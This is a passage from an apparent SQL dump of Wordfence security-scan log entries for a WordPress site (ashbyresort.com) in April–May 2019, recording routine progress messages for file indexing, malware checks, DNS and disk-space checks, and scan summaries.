far'),(29952,1556440003.719758,2,'info','Analyzed 5000 files containing 95.5 MB of data so far'),(29953,1556440003.990848,2,'info','Analyzed 5100 files containing 96.29 MB of data so far'),(29954,1556440004.210866,2,'info','Analyzed 5200 files containing 96.78 MB of data so far'),(29955,1556440004.432445,2,'info','Analyzed 5300 files containing 97.13 MB of data so far'),(29956,1556440004.796012,2,'info','Analyzed 5400 files containing 97.41 MB of data so far'),(29957,1556440005.068120,2,'info','Analyzed 5500 files containing 97.72 MB of data so far'),(29958,1556440005.342765,2,'info','Analyzed 5600 files containing 98.43 MB of data so far'),(29959,1556440006.160903,2,'info','Analyzed 5700 files containing 102.57 MB of data so far'),(29960,1556440007.180837,2,'info','Analyzed 5800 files containing 107.75 MB of data so far'),(29828,1556241606.384871,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(29429,1555916682.124142,2,'info','The disk has 140949 MB available'),(29424,1555916682.110473,2,'info','Scanning DNS A record for ashbyresort.com'),(29425,1555916682.112585,2,'info','Scanning DNS MX record for ashbyresort.com'),(29428,1555916682.123889,2,'info','Total disk space: 5.41 TB -- Free disk space: 137.65 GB'),(29085,1555397975.064174,2,'info','Scanned contents of 116 additional files at 13.18 per second'),(29493,1555916702.046576,2,'info','Analyzed 2700 files containing 54.99 MB of data so far'),(29492,1555916701.676911,2,'info','Analyzed 2600 files containing 54.4 MB of data so far'),(29209,1555656710.649865,2,'info','Analyzed 300 files containing 3.8 MB of data so far'),(29210,1555656711.159794,2,'info','Analyzed 400 files containing 5.97 MB of data so far'),(29199,1555656707.759592,2,'info','4500 files indexed'),(29200,1555656707.972557,2,'info','5000 files indexed'),(29201,1555656708.045891,2,'info','5500 files indexed'),(29202,1555656708.153812,2,'info','6000 files indexed'),(29203,1555656708.388306,2,'info','6500 files indexed'),(29204,1555656708.618411,2,'info','7000 files indexed'),(29205,1555656709.082560,2,'info','7500 files indexed'),(29206,1555656709.349387,2,'info','7917 files indexed'),(29207,1555656709.879060,2,'info','Analyzed 100 files containing 1.36 MB of data so far'),(29208,1555656710.273456,2,'info','Analyzed 200 files containing 2.44 MB of data so far'),(30251,1556693688.683466,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(30008,1556440045.883963,2,'info','Asking Wordfence to check URLs against malware list.'),(29091,1555397984.830958,2,'info','Scanned contents of 257 additional files at 13.84 per second'),(29090,1555397980.152840,2,'info','Scanned contents of 236 additional files at 16.99 per second'),(29089,1555397979.138579,2,'info','Scanned contents of 210 additional files at 16.31 per second'),(29088,1555397978.132455,2,'info','Scanned contents of 193 additional files at 16.26 per second'),(29086,1555397976.077759,2,'info','Scanned contents of 149 additional files at 15.18 per second'),(29087,1555397977.093540,2,'info','Scanned contents of 169 additional files at 15.61 per second'),(29522,1555916716.571302,2,'info','Analyzed 5600 files containing 98.43 MB of data so far'),(29521,1555916716.308308,2,'info','Analyzed 5500 files containing 97.72 MB of data so far'),(29520,1555916716.100292,2,'info','Analyzed 5400 files containing 97.41 MB of data so far'),(29354,1555656830.137832,2,'info','Checking 1 URLs from 1 sources.'),(29353,1555656830.132046,2,'info','Done host key check.'),(29352,1555656829.711894,2,'info','Checking 1959 host keys against Wordfence scanning servers.'),(30267,1556760493.332359,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(30266,1556760493.304339,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(29233,1555656725.795301,2,'info','Analyzed 2700 files containing 54.99 MB of data so far'),(29573,1555916749.245235,2,'info','Done file contents scan'),(30107,1556693585.984411,2,'info','500 files indexed'),(30108,1556693586.678928,2,'info','1000 files indexed'),(29720,1556175089.682682,2,'info','Analyzed 3700 files containing 81.39 MB of data so far'),(30051,1556592797.049537,10,'info','SUM_PREP:Preparing a new scan.'),(30050,1556502011.947754,10,'info','SUM_FINAL:Scan complete. You have 1 new issue to fix. See below.'),(30226,1556693673.688240,2,'info','Scanned contents of 253 additional files at 18.68 per second'),(30227,1556693681.234650,2,'info','Scanned contents of 256 additional files at 12.14 per second'),(29645,1556175057.860440,2,'info','Total disk space: 5.41 TB -- Free disk space: 124.24 GB'),(29646,1556175057.860723,2,'info','The disk has 127222.55 MB available'),(29969,1556440014.555364,2,'info','Analyzed 6700 files containing 121.76 MB of data so far'),(29970,1556440015.041823,2,'info','Analyzed 6800 files containing 123.29 MB of data so far'),(29971,1556440015.259275,2,'info','Analyzed 6900 files containing 123.46 MB of data so far'),(29972,1556440015.404540,2,'info','Analyzed 7000 files containing 123.48 MB of data so far'),(29973,1556440015.803564,2,'info','Analyzed 7100 files containing 123.87 MB of data so far'),(29974,1556440016.903148,2,'info','Analyzed 7200 files containing 127.65 MB of data so far'),(29975,1556440017.387417,2,'info','Analyzed 7300 files containing 130.8 MB of data so far'),(29976,1556440017.779761,2,'info','Analyzed 7400 files containing 132.04 MB of data so far'),(29655,1556175058.002897,2,'info','Found 8 themes'),(30044,1556502011.901711,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(29654,1556175057.893083,2,'info','Getting theme list from WordPress'),(29117,1555397993.494482,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(30024,1556440047.134518,10,'info','SUM_START:Scanning comments for URLs on a domain blacklist'),(29566,1555916747.865418,2,'info','Scanned contents of 256 additional files at 15.29 per second'),(30261,1556693688.742933,10,'info','SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),(29814,1556175136.081166,2,'info','Done examining URLs'),(29516,1555916715.247001,2,'info','Analyzed 5000 files containing 95.5 MB of data so far'),(29228,1555656723.509126,2,'info','Analyzed 2200 files containing 46.58 MB of data so far'),(29838,1556329223.758364,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(29967,1556440013.206510,2,'info','Analyzed 6500 files containing 117.72 MB of data so far'),(29470,1555916688.502418,2,'info','Analyzed 400 files containing 5.97 MB of data so far'),(29471,1555916688.766057,2,'info','Analyzed 500 files containing 6.73 MB of data so far'),(30231,1556693682.398230,2,'info','Done host key check.'),(29222,1555656721.591673,2,'info','Analyzed 1600 files containing 39.37 MB of data so far'),(29539,1555916723.917152,2,'info','Analyzed 7300 files containing 130.86 MB of data so far'),(29540,1555916724.236830,2,'info','Analyzed 7400 files containing 132.1 MB of data so far'),(29178,1555656705.730471,2,'info','Getting theme list from WordPress'),(29177,1555656705.730024,2,'info','Found 21 plugins'),(29423,1555916682.039166,2,'info','Starting DNS scan for ashbyresort.com'),(29837,1556329223.757662,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29831,1556329223.655086,1,'info','Initiating quick scan'),(29836,1556329223.756560,1,'info','-------------------'),(29176,1555656705.727013,2,'info','Getting plugin list from WordPress'),(30131,1556693608.122179,2,'info','Analyzed 800 files containing 14.37 MB of data so far'),(29377,1555656836.030973,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(29329,1555656799.691220,2,'info','Scanned contents of 514 additional files at 11.58 per second'),(29629,1556155349.498561,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30064,1556673595.041036,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(29631,1556175048.685880,1,'info','Scheduled Wordfence scan starting at Thursday 25th of April 2019 01:50:48 AM'),(29463,1555916686.398279,2,'info','7000 files indexed'),(29464,1555916686.977157,2,'info','7500 files indexed'),(29465,1555916687.177988,2,'info','8000 files indexed'),(29466,1555916687.185787,2,'info','8113 files indexed'),(29467,1555916687.489973,2,'info','Analyzed 100 files containing 1.36 MB of data so far'),(29468,1555916687.760592,2,'info','Analyzed 200 files containing 2.44 MB of data so far'),(29469,1555916688.035796,2,'info','Analyzed 300 files containing 3.8 MB of data so far'),(29211,1555656711.496097,2,'info','Analyzed 500 files containing 6.73 MB of data so far'),(29491,1555916701.330053,2,'info','Analyzed 2500 files containing 53.52 MB of data so far'),(30262,1556760493.291109,10,'info','SUM_PREP:Preparing a new scan.'),(30263,1556760493.294138,1,'info','Initiating quick scan'),(30264,1556760493.297757,10,'info','SUM_START:Checking Web Application Firewall status'),(29459,1555916685.586403,2,'info','5000 files indexed'),(29152,1555637229.789176,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29151,1555637229.787790,1,'info','-------------------'),(29789,1556175130.977993,2,'info','Done host key check.'),(29790,1556175130.979578,2,'info','Checking 1 URLs from 1 sources.'),(29714,1556175081.984797,2,'info','Analyzed 3100 files containing 61.65 MB of data so far'),(29716,1556175082.622753,2,'info','Analyzed 3300 files containing 64.02 MB of data so far'),(29966,1556440009.484411,2,'info','Analyzed 6400 files containing 115.47 MB of data so far'),(29890,1556439965.984143,2,'info','2500 files indexed'),(29891,1556439966.485692,2,'info','3000 files indexed'),(29362,1555656830.525587,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(29892,1556439966.711630,2,'info','3500 files indexed'),(29893,1556439966.950558,2,'info','4000 files indexed'),(29715,1556175082.274802,2,'info','Analyzed 3200 files containing 62.33 MB of data so far'),(29894,1556439967.106872,2,'info','4500 files indexed'),(29895,1556439967.356936,2,'info','5000 files indexed'),(29896,1556439967.413822,2,'info','5500 files indexed'),(29897,1556439967.586602,2,'info','6000 files indexed'),(29898,1556439967.821522,2,'info','6500 files indexed'),(29899,1556439968.304760,2,'info','7000 files indexed'),(29900,1556439972.013369,2,'info','7396 files indexed'),(29901,1556439975.346236,2,'info','7896 files indexed'),(29902,1556439975.405993,2,'info','8113 files indexed'),(29903,1556439975.768713,2,'info','Analyzed 100 files containing 1.36 MB of data so far'),(29904,1556439976.101573,2,'info','Analyzed 200 files containing 2.44 MB of data so far'),(29905,1556439976.438290,2,'info','Analyzed 300 files containing 3.8 MB of data so far'),(29906,1556439977.005642,2,'info','Analyzed 400 files containing 5.97 MB of data so far'),(29907,1556439977.315952,2,'info','Analyzed 500 files containing 6.73 MB of data so far'),(29908,1556439977.876219,2,'info','Analyzed 600 files containing 9.08 MB of data so far'),(29909,1556439978.209766,2,'info','Analyzed 700 files containing 10.33 MB of data so far'),(29597,1555916752.929160,1,'info','-------------------'),(29598,1555916752.929669,2,'info','Wordfence used 28.06 MB of memory for scan. Server peak memory usage was: 86.06 MB'),(29599,1555916752.929934,1,'info','Scan Complete. Scanned 8113 files, 21 plugins, 8 themes, 21 posts, 0 comments and 687 URLs in 1 minute 18 seconds.'),(29932,1556439990.080699,2,'info','Analyzed 3000 files containing 61.18 MB of data so far'),(29931,1556439989.843555,2,'info','Analyzed 2900 files containing 60.77 MB of data so far'),(30114,1556693591.943045,2,'info','4000 files indexed'),(30115,1556693593.102807,2,'info','4500 files indexed'),(30112,1556693589.678902,2,'info','3000 files indexed'),(30113,1556693590.930714,2,'info','3500 files indexed'),(30111,1556693588.222367,2,'info','2500 files indexed'),(30109,1556693587.408081,2,'info','1500 files indexed'),(30110,1556693587.736940,2,'info','2000 files indexed'),(29556,1555916731.118806,2,'info','Starting scan of file contents'),(29557,1555916732.465790,2,'info','Scanned contents of 22 additional files at 16.36 per second'),(29248,1555656736.460590,2,'info','Analyzed 4200 files containing 83.23 MB of data so far'),(29878,1556439964.898622,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(29921,1556439985.065147,2,'info','Analyzed 1900 files containing 41.82 MB of data so far'),(29191,1555656706.810855,2,'info','500 files indexed'),(29110,1555397986.506986,2,'info','Starting password strength check on 2 users.'),(29231,1555656725.071034,2,'info','Analyzed 2500 files containing 53.52 MB of data so far'),(29300,1555656761.519151,2,'info','Scanned contents of 100 additional files at 16.09 per second'),(29343,1555656816.334966,2,'info','Scanned contents of 731 additional files at 11.98 per second'),(29816,1556175136.096446,1,'info','-------------------'),(29817,1556175136.097595,2,'info','Wordfence used 27.98 MB of memory for scan. Server peak memory usage was: 85.98 MB'),(29818,1556175136.097944,1,'info','Scan Complete. Scanned 8113 files, 21 plugins, 8 themes, 21 posts, 0 comments and 687 URLs in 1 minute 25 seconds.'),(30065,1556673595.046238,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(29627,1556155349.497066,1,'info','-------------------'),(29877,1556439964.895281,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(29712,1556175081.406982,2,'info','Analyzed 2900 files containing 60.77 MB of data so far'),(29179,1555656705.738088,2,'info','Found 8 themes'),(30246,1556693683.473482,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blacklist'),(29713,1556175081.679370,2,'info','Analyzed 3000 files containing 61.18 MB of data so far'),(29083,1555397972.989221,2,'info','Scanned contents of 79 additional files at 11.75 per second'),(29084,1555397974.008795,2,'info','Scanned contents of 100 additional files at 12.91 per second'),(29511,1555916713.188313,2,'info','Analyzed 4500 files containing 84.93 MB of data so far'),(29512,1555916713.430884,2,'info','Analyzed 4600 files containing 85.39 MB of data so far'),(29513,1555916713.875448,2,'info','Analyzed 4700 files containing 87.35 MB of data so far'),(29514,1555916714.729038,2,'info','Analyzed 4800 files containing 92.64 MB of data so far'),(29515,1555916714.935889,2,'info','Analyzed 4900 files containing 93.95 MB of data so far'),(29330,1555656800.695427,2,'info','Scanned contents of 528 additional files at 11.63 per second'),(29450,1555916683.371390,2,'info','500 files indexed'),(29451,1555916683.684153,2,'info','1000 files indexed'),(29462,1555916685.987588,2,'info','6500 files indexed'),(29345,1555656818.429752,2,'info','Scanned contents of 784 additional files at 12.42 per second'),(29346,1555656819.451872,2,'info','Scanned contents of 799 additional files at 12.46 per second'),(30205,1556693656.434612,2,'info','Analyzed 8113 files containing 146.69 MB of data.'),(30206,1556693656.435249,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(30061,1556673595.033765,10,'info','SUM_PREP:Preparing a new scan.'),(30062,1556673595.037072,1,'info','Initiating quick scan'),(30063,1556673595.040356,10,'info','SUM_START:Checking Web Application Firewall status'),(30234,1556693683.079789,2,'info','Done file contents scan'),(30235,1556693683.081704,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(29146,1555637229.733607,1,'info','Initiating quick scan'),(29633,1556175051.111100,1,'info','Contacting Wordfence to initiate scan'),(30236,1556693683.087464,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blacklist'),(30083,1556693580.430211,10,'info','SUM_ENDOK:Scanning DNS for unauthorized changes'),(29232,1555656725.527528,2,'info','Analyzed 2600 files containing 54.4 MB of data so far'),(29481,1555916697.144348,2,'info','Analyzed 1500 files containing 35.08 MB of data so far'),(30193,1556693650.365282,2,'info','Analyzed 7000 files containing 123.48 MB of data so far'),(30194,1556693650.935328,2,'info','Analyzed 7100 files containing 123.87 MB of data so far'),(29563,1555916738.621045,2,'info','Scanned contents of 180 additional files at 24.00 per second'),(30196,1556693652.453853,2,'info','Analyzed 7300 files containing 130.76 MB of data so far'),(30195,1556693651.904487,2,'info','Analyzed 7200 files containing 127.65 MB of data so far'),(30203,1556693656.186809,2,'info','Analyzed 8000 files containing 144.55 MB of data so far'),(30202,1556693655.461482,2,'info','Analyzed 7900 files containing 141.31 MB of data so far'),(30201,1556693654.458818,2,'info','Analyzed 7800 files containing 139 MB of data so far'),(30200,1556693653.903936,2,'info','Analyzed 7700 files containing 136.9 MB of data so far'),(30199,1556693653.623830,2,'info','Analyzed 7600 files containing 135.74 MB of data so far'),(30198,1556693653.297879,2,'info','Analyzed 7500 files containing 134.3 MB of data so far'),(30197,1556693652.861385,2,'info','Analyzed 7400 files containing 131.99 MB of data so far'),(29996,1556440027.350005,2,'info','Scanned contents of 96 additional files at 19.19 per second'),(29321,1555656791.144946,2,'info','Scanned contents of 386 additional files at 10.77 per second'),(30130,1556693607.292499,2,'info','Analyzed 700 files containing 10.33 MB of data so far'),(29323,1555656793.538720,2,'info','Scanned contents of 419 additional files at 10.96 per second'),(29322,1555656792.500047,2,'info','Scanned contents of 401 additional files at 10.78 per second'),(30129,1556693606.932518,2,'info','Analyzed 600 files containing 9.08 MB of data so far'),(29997,1556440028.352132,2,'info','Scanned contents of 107 additional files at 17.82 per second'),(30106,1556693581.680924,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(30105,1556693581.674977,10,'info','SUM_START:Scanning for known malware files'),(30104,1556693581.672066,10,'info','SUM_DISABLED:Skipping plugin scan'),(30103,1556693581.671367,10,'info','SUM_DISABLED:Skipping theme scan'),(29579,1555916749.286999,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(29580,1555916749.287427,2,'info','Checking 2 host keys against Wordfence scanning servers.'),(29581,1555916749.592914,2,'info','Done host key check.'),(29582,1555916749.593352,2,'info','Done examining URLs'),(30102,1556693581.667362,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(30101,1556693581.661527,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(30100,1556693581.654901,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(29587,1555916749.620324,2,'info','Starting password strength check on 2 users.'),(29092,1555397985.538102,2,'info','Scanned contents of 263 additional files at 13.65 per second'),(29093,1555397985.538653,2,'info','Asking Wordfence to check URLs against malware list.'),(29452,1555916683.988088,2,'info','1500 files indexed'),(30250,1556693683.514489,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(30116,1556693593.953942,2,'info','5000 files indexed'),(30117,1556693594.596582,2,'info','5500 files indexed'),(30118,1556693595.310537,2,'info','6000 files indexed'),(30119,1556693596.251637,2,'info','6500 files indexed'),(30120,1556693597.321023,2,'info','7000 files indexed'),(30179,1556693637.896666,2,'info','Analyzed 5600 files containing 98.43 MB of data so far'),(30178,1556693637.529679,2,'info','Analyzed 5500 files containing 97.72 MB of data so far'),(30177,1556693637.204220,2,'info','Analyzed 5400 files containing 97.41 MB of data so far'),(30176,1556693636.910212,2,'info','Analyzed 5300 files containing 97.13 MB of data so far'),(30175,1556693636.721020,2,'info','Analyzed 5200 files containing 96.78 MB of data so far'),(29567,1555916748.516808,2,'info','Scanned contents of 262 additional files at 15.06 per second'),(30209,1556693656.452408,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(30207,1556693656.440203,10,'info','SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),(30208,1556693656.444062,10,'info','SUM_ENDOK:Scanning for known malware files'),(29328,1555656798.668884,2,'info','Scanned contents of 495 additional files at 11.41 per second'),(29347,1555656820.522915,2,'info','Scanned contents of 827 additional files at 12.68 per second'),(29348,1555656821.633174,2,'info','Scanned contents of 846 additional files at 12.75 per second'),(29349,1555656828.948801,2,'info','Scanned contents of 849 additional files at 11.53 per second'),(29122,1555397993.506866,1,'info','Scan Complete. Scanned 8105 files, 21 plugins, 8 themes, 21 posts, 0 comments and 211 URLs in 1 minute 16 seconds.'),(29479,1555916695.763049,2,'info','Analyzed 1300 files containing 28.93 MB of data so far'),(29480,1555916696.256802,2,'info','Analyzed 1400 files containing 31.02 MB of data so far'),(29125,1555468176.596827,1,'info','Initiating quick scan'),(30049,1556502011.947408,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30048,1556502011.947035,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(30047,1556502011.945971,1,'info','-------------------'),(29299,1555656760.412325,2,'info','Scanned contents of 84 additional files at 16.45 per second'),(29562,1555916737.598502,2,'info','Scanned contents of 152 additional files at 23.47 per second'),(29995,1556440026.337561,2,'info','Scanned contents of 76 additional files at 19.05 per second'),(29994,1556440024.834633,2,'info','Scanned contents of 65 additional files at 26.14 per second'),(29993,1556440023.801229,2,'info','Scanned contents of 22 additional files at 15.13 per second'),(30128,1556693606.383063,2,'info','Analyzed 500 files containing 6.73 MB of data so far'),(30127,1556693606.166903,2,'info','Analyzed 400 files containing 5.97 MB of data so far'),(30126,1556693605.796942,2,'info','Analyzed 300 files containing 3.8 MB of data so far'),(30125,1556693605.541644,2,'info','Analyzed 200 files containing 2.44 MB of data so far'),(29990,1556440020.711409,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(29991,1556440020.713895,10,'info','SUM_START:Scanning file contents for URLs on a domain blacklist'),(29992,1556440022.345476,2,'info','Starting scan of file contents'),(29245,1555656735.811193,2,'info','Analyzed 3900 files containing 82.06 MB of data so far'),(29246,1555656735.997457,2,'info','Analyzed 4000 files containing 82.38 MB of data so far'),(29247,1555656736.239588,2,'info','Analyzed 4100 files containing 82.93 MB of data so far'),(29312,1555656778.272834,2,'info','Scanned contents of 278 additional files at 12.10 per second'),(30192,1556693649.992924,2,'info','Analyzed 6900 files containing 123.46 MB of data so far'),(29478,1555916695.430769,2,'info','Analyzed 1200 files containing 27.48 MB of data so far'),(29477,1555916694.090595,2,'info','Analyzed 1100 files containing 20.74 MB of data so far'),(29294,1555656755.302750,2,'info','Starting scan of file contents'),(29295,1555656756.338068,2,'info','Scanned contents of 17 additional files at 16.45 per second'),(29296,1555656757.364057,2,'info','Scanned contents of 41 additional files at 19.91 per second'),(29297,1555656758.366463,2,'info','Scanned contents of 50 additional files at 16.33 per second'),(29298,1555656759.384496,2,'info','Scanned contents of 69 additional files at 16.91 per second'),(30046,1556502011.941866,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(29507,1555916712.119906,2,'info','Analyzed 4100 files containing 82.93 MB of data so far'),(29508,1555916712.406825,2,'info','Analyzed 4200 files containing 83.23 MB of data so far'),(29509,1555916712.574242,2,'info','Analyzed 4300 files containing 83.46 MB of data so far'),(29510,1555916713.015621,2,'info','Analyzed 4400 files containing 84.79 MB of data so far'),(30030,1556440055.579244,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(30272,1556846991.203829,10,'info','SUM_PREP:Preparing a new scan.'),(29395,1555809701.045889,1,'info','Initiating quick scan'),(29864,1556439963.845538,2,'info','Total disk space: 5.41 TB -- Free disk space: 145.34 GB'),(30271,1556760493.343591,10,'info','SUM_FINAL:Scan complete. You have 5 new issues to fix. See below.'),(29315,1555656781.306900,2,'info','Scanned contents of 320 additional files at 12.31 per second'),(29316,1555656782.455736,2,'info','Scanned contents of 330 additional files at 12.15 per second'),(30210,1556693656.533906,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(30242,1556693683.441437,2,'info','Done host key check.'),(30247,1556693683.481758,10,'info','SUM_START:Scanning for weak passwords'),(29929,1556439988.523309,2,'info','Analyzed 2700 files containing 54.99 MB of data so far'),(29504,1555916711.468425,2,'info','Analyzed 3800 files containing 81.59 MB of data so far'),(29505,1555916711.702374,2,'info','Analyzed 3900 files containing 82.06 MB of data so far'),(30212,1556693656.542895,10,'info','SUM_START:Scanning file contents for URLs on a domain blacklist'),(29506,1555916711.910088,2,'info','Analyzed 4000 files containing 82.38 MB of data so far'),(30211,1556693656.540814,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(30075,1556693567.068271,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(29438,1555916682.258188,2,'info','Found 8 themes'),(29732,1556175094.984739,2,'info','Analyzed 4900 files containing 93.95 MB of data so far'),(29314,1555656780.303448,2,'info','Scanned contents of 304 additional files at 12.16 per second'),(30028,1556440047.241160,10,'info','SUM_ENDOK:Scanning for weak passwords'),(29773,1556175112.063585,2,'info','Starting scan of file contents'),(30029,1556440047.253104,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(29885,1556439964.914868,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(29370,1555656830.900570,2,'info','Starting password strength check on 2 users.'),(29886,1556439965.004692,2,'info','500 files indexed'),(29887,1556439965.276416,2,'info','1000 files indexed'),(29888,1556439965.649871,2,'info','1500 files indexed'),(29889,1556439965.795060,2,'info','2000 files indexed'),(29737,1556175096.388211,2,'info','Analyzed 5400 files containing 97.41 MB of data so far'),(30041,1556502011.895985,10,'info','SUM_PREP:Preparing a new scan.'),(30042,1556502011.898660,1,'info','Initiating quick scan'),(30043,1556502011.901197,10,'info','SUM_START:Checking Web Application Firewall status'),(29602,1555982404.600077,1,'info','Initiating quick scan'),(30085,1556693580.443159,2,'info','Total disk space: 5.41 TB -- Free disk space: 102.65 GB'),(30084,1556693580.439497,10,'info','SUM_START:Scanning to check available disk space'),(30080,1556693575.454215,2,'info','Starting DNS scan for ashbyresort.com'),(30081,1556693580.221728,2,'info','Scanning DNS A record for ashbyresort.com'),(30082,1556693580.428883,2,'info','Scanning DNS MX record for ashbyresort.com'),(29153,1555637229.789936,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30066,1556673595.064052,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(29155,1555656695.157990,1,'info','Scheduled Wordfence scan starting at Friday 19th of April 2019 01:51:35 AM'),(29157,1555656697.409434,1,'info','Contacting Wordfence to initiate scan'),(30215,1556693662.284188,2,'info','Scanned contents of 22 additional files at 10.29 per second'),(30213,1556693657.598952,2,'info','Starting scan of file contents'),(30214,1556693661.168539,2,'info','Scanned contents of 3 additional files at 2.93 per second'),(29607,1555982404.633069,1,'info','-------------------'),(29365,1555656830.842422,2,'info','Done examining URLs'),(29979,1556440018.594976,2,'info','Analyzed 7700 files containing 136.94 MB of data so far'),(29978,1556440018.409128,2,'info','Analyzed 7600 files containing 135.78 MB of data so far'),(29977,1556440018.149462,2,'info','Analyzed 7500 files containing 134.34 MB of data so far'),(29595,1555916752.921154,2,'info','Done examining URLs'),(30088,1556693580.452754,10,'info','SUM_START:Checking Web Application Firewall status'),(30089,1556693580.456061,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(30090,1556693580.463995,10,'info','SUM_START:Checking for future GeoIP support'),(30091,1556693580.467302,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(30092,1556693580.498414,2,'info','Getting plugin list from WordPress'),(30093,1556693580.500905,2,'info','Found 21 plugins'),(29472,1555916689.322275,2,'info','Analyzed 600 files containing 9.08 MB of data so far'),(30225,1556693672.607345,2,'info','Scanned contents of 233 additional files at 18.70 per second'),(29460,1555916685.638202,2,'info','5500 files indexed'),(29461,1555916685.786382,2,'info','6000 files indexed'),(29259,1555656738.993489,2,'info','Analyzed 5300 files containing 92.15 MB of data so far'),(29252,1555656737.293886,2,'info','Analyzed 4600 files containing 85.39 MB of data so far'),(29253,1555656737.696768,2,'info','Analyzed 4700 files containing 87.13 MB of data so far'),(29254,1555656737.912364,2,'info','Analyzed 4800 files containing 88.93 MB of data so far'),(29255,1555656738.198747,2,'info','Analyzed 4900 files containing 90.07 MB of data so far'),(29256,1555656738.473401,2,'info','Analyzed 5000 files containing 91.04 MB of data so far'),(29257,1555656738.672642,2,'info','Analyzed 5100 files containing 91.53 MB of data so far'),(29258,1555656738.831911,2,'info','Analyzed 5200 files containing 91.88 MB of data so far'),(30123,1556693600.870346,2,'info','8113 files indexed'),(30124,1556693605.278100,2,'info','Analyzed 100 files containing 1.36 MB of data so far'),(30001,1556440036.968671,2,'info','Scanned contents of 187 additional files at 12.79 per second'),(30002,1556440038.101357,2,'info','Scanned contents of 197 additional files at 12.50 per second'),(29998,1556440033.886799,2,'info','Scanned contents of 114 additional files at 9.88 per second'),(29999,1556440034.946907,2,'info','Scanned contents of 149 additional files at 11.83 per second'),(30000,1556440035.959468,2,'info','Scanned contents of 160 additional files at 11.75 per second'),(29267,1555656742.822074,2,'info','Analyzed 6100 files containing 106.3 MB of data so far'),(29266,1555656742.347498,2,'info','Analyzed 6000 files containing 104.21 MB of data so far'),(29265,1555656742.128735,2,'info','Analyzed 5900 files containing 103.72 MB of data so far'),(29260,1555656739.161486,2,'info','Analyzed 5400 files containing 92.47 MB of data so far'),(29261,1555656739.401137,2,'info','Analyzed 5500 files containing 93.18 MB of data so far'),(29262,1555656740.729031,2,'info','Analyzed 5600 files containing 97.32 MB of data so far'),(29263,1555656741.744354,2,'info','Analyzed 5700 files containing 102.49 MB of data so far'),(29264,1555656741.929853,2,'info','Analyzed 5800 files containing 103.16 MB of data so far'),(30147,1556693616.495004,2,'info','Analyzed 2400 files containing 48.72 MB of data so far'),(30146,1556693616.208709,2,'info','Analyzed 2300 files containing 47.53 MB of data so far'),(30145,1556693615.914244,2,'info','Analyzed 2200 files containing 46.58 MB of data so far'),(30144,1556693615.202413,2,'info','Analyzed 2100 files containing 43.52 MB of data so far'),(29530,1555916720.280225,2,'info','Analyzed 6400 files containing 115.47 MB of data so far'),(29968,1556440013.849426,2,'info','Analyzed 6600 files containing 119.74 MB of data so far'),(29531,1555916720.841767,2,'info','Analyzed 6500 files containing 117.72 MB of data so far'),(29532,1555916721.377412,2,'info','Analyzed 6600 files containing 119.74 MB of data so far'),(29723,1556175090.440490,2,'info','Analyzed 4000 files containing 82.38 MB of data so far'),(29722,1556175090.198120,2,'info','Analyzed 3900 files containing 82.06 MB of data so far'),(29721,1556175089.889705,2,'info','Analyzed 3800 files containing 81.59 MB of data so far'),(29728,1556175092.315208,2,'info','Analyzed 4500 files containing 84.93 MB of data so far'),(29727,1556175091.987714,2,'info','Analyzed 4400 files containing 84.79 MB of data so far'),(29726,1556175091.483174,2,'info','Analyzed 4300 files containing 83.46 MB of data so far'),(29725,1556175091.242235,2,'info','Analyzed 4200 files containing 83.23 MB of data so far'),(29724,1556175090.818807,2,'info','Analyzed 4100 files containing 82.93 MB of data so far'),(29988,1556440020.630834,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(29986,1556440020.615605,10,'info','SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),(29987,1556440020.621339,10,'info','SUM_ENDOK:Scanning for known malware files'),(29927,1556439987.776115,2,'info','Analyzed 2500 files containing 53.52 MB of data so far'),(29926,1556439986.661857,2,'info','Analyzed 2400 files containing 48.72 MB of data so far'),(29925,1556439986.395054,2,'info','Analyzed 2300 files containing 47.53 MB of data so far'),(29924,1556439986.189473,2,'info','Analyzed 2200 files containing 46.58 MB of data so far'),(29923,1556439985.528379,2,'info','Analyzed 2100 files containing 43.52 MB of data so 